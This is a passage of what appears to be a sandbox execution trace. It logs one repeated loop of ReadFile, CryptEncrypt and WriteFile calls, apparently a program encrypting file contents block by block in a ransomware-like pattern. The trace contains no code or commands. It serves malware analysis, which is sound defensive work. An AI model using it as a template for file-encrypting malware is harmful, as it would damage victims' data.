lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.574] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.574] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.574] GetLastError () returned 0x0 [0165.574] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.574] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.574] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.574] GetLastError () returned 0x0 [0165.574] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.574] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.574] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.574] GetLastError () returned 0x0 [0165.574] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.574] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.574] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.574] GetLastError () returned 0x0 [0165.574] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.574] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.574] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.574] GetLastError () returned 0x0 [0165.574] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.574] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.574] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.574] GetLastError () returned 0x0 [0165.574] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.574] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.575] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.575] GetLastError () returned 0x0 [0165.575] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.575] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.575] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.575] GetLastError () returned 0x0 [0165.575] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.575] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.575] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.575] GetLastError () returned 0x0 [0165.575] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.575] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.575] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.575] GetLastError () returned 0x0 [0165.575] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.575] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.575] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.575] GetLastError () returned 0x0 [0165.575] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.575] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.575] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.575] GetLastError () returned 0x0 [0165.575] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.575] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.575] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.575] GetLastError () returned 0x0 [0165.575] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.576] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.576] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.576] GetLastError () returned 0x0 [0165.576] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.576] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.576] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.576] GetLastError () returned 0x0 [0165.576] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.576] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.576] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.576] GetLastError () returned 0x0 [0165.576] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.576] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.576] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.576] GetLastError () returned 0x0 [0165.576] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.576] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.576] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.576] GetLastError () returned 0x0 [0165.576] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.576] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.576] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.576] GetLastError () returned 0x0 [0165.576] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.577] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.577] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.577] GetLastError () returned 0x0 [0165.577] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.577] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.577] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.577] GetLastError () returned 0x0 [0165.577] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.577] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.577] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.577] GetLastError () returned 0x0 [0165.577] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.577] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.577] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.577] GetLastError () returned 0x0 [0165.577] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.577] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.577] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.577] GetLastError () returned 0x0 [0165.577] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.577] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.577] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.577] GetLastError () returned 0x0 [0165.577] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.577] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.578] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.578] GetLastError () returned 0x0 [0165.578] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.578] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.578] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.578] GetLastError () returned 0x0 [0165.578] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.578] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.578] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.578] GetLastError () returned 0x0 [0165.578] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.578] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.578] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.578] GetLastError () returned 0x0 [0165.578] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.578] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.578] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.578] GetLastError () returned 0x0 [0165.578] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.578] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.578] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.578] GetLastError () returned 0x0 [0165.578] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.578] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.578] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.578] GetLastError () returned 0x0 [0165.578] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, 